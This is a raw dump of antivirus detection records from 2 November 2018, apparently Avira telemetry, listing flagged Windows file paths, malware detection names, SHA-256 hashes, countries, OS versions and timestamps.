  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b33188345221fe48b1d85accb25b53481d646576', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\b33188345221fe48b1d85accb25b53481d646576', filesize=2816000, name='HEUR/AGEN.1034774.#M1.#R1'), hash='4423f553c973d18a2c90a3f6d129d8965aa2cda46963d2901a79029e486072a4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:00:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unt591a.tmp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\U5919.tmp\\UNT591A.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='4affd24c9f82a4b944e5341be867198ae6877557d7f1f50d6618ca2cbb7f6c91', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T14:57:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061222-3b4cc90e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061222-3B4CC90E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='62d7835ba92d38b165a02f6b16f881f7be7c6931fbda01a4ff38506bf7421a96', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050712-20855ae2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050712-20855AE2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060101-a56b49ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060101-A56B49CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lilipqxn.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\LILIpqXN.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='E:\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='E:\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:40:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050744-33d95d77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050744-33D95D77', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061348-6eb6afd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061348-6EB6AFD5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='quurmalx.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\quURmaLX.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6f2faef8f1b03f2f82f15cc0fecb49eecd17130aacc1a1bac7ab253c531666c9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6F2FAEF8F1B03F2F82F15CC0FECB49EECD17130AACC1A1BAC7AB253C531666C9', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='6f2faef8f1b03f2f82f15cc0fecb49eecd17130aacc1a1bac7ab253c531666c9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:50:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050257-88e3c97f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050257-88E3C97F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160324-1220df6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-160324-1220DF6B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:06:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000094f', filepath='C:\\Windows\\Temp\\tmp00000098\\tmp0000094f', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T19:44:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='offerswizarddata.dll', filepath='C:\\Backup My Data\\Fabian\\AppData\\Local\\{2E96F42D-DDF0-41B2-8690-EC41E079BF4F}\\OffersWizardData.dll', filesize=1792000, name='ADWARE/OffersWizard.1792000.#M1.#R1'), hash='68a5b5b209642b4dc351172859cb0cb7cdc19e6cdcbebc49be2b1209ea99e657', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avp.exe', parentsize=365336, timestamp='2018-11-02T10:20:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4a6ecb9d64be67893ea45dd7e27fa49b14eb658273a890aeceb34c89f2b00af2.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\28.10.2016-323.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1002656\\4a6ecb9d64be67893ea45dd7e27fa49b14eb658273a890aeceb34c89f2b00af2.MRG', filesize=896000, name='HEUR/AGEN.1002656.#M1.#R1'), hash='4a6ecb9d64be67893ea45dd7e27fa49b14eb658273a890aeceb34c89f2b00af2', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\30.03.2018-4.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T17:28:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000200b', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp0000200b', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:53:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161615-1d134135', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4287271a\\AVSCAN-20181102-161549-19CD3B48\\AVSCAN-20181102-161615-1D134135', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:16:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='littleha.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\LITTLEHA\\LITTLEHA.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122411-863d0dda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122411-863D0DDA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:27:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051541-500acbf4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051541-500ACBF4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110306-3e82d755', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_86c2ba61\\AVSCAN-20181102-110235-3B822F60\\AVSCAN-20181102-110306-3E82D755', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051028-95d22917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051028-95D22917', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061757-02b37629', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061757-02B37629', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055145-5a0b7c45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055145-5A0B7C45', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051347-0c401786', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051347-0C401786', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060815-a80f2046', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060815-A80F2046', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052105-11305ea8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052105-11305EA8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062657-44fdd397', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062657-44FDD397', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050500-d22d728b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050500-D22D728B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050844-577f5786', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050844-577F5786', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060050-9eefaf1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060050-9EEFAF1D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051404-16020d7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051404-16020D7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062531-1152e2f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062531-1152E2F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060901-c33de0a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060901-C33DE0A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053949-af4b9521', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053949-AF4B9521', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050923-6ee72a01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050923-6EE72A01', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050919-6c5c6e9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050919-6C5C6E9E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052915-354db06e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052915-354DB06E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061840-1cd9dd6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061840-1CD9DD6C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054004-b7d92654', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054004-B7D92654', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062041-64dc0459', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062041-64DC0459', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053042-6921ebf1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053042-6921EBF1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:41Z'), dt=datetime.date(2018, 11, 2)),
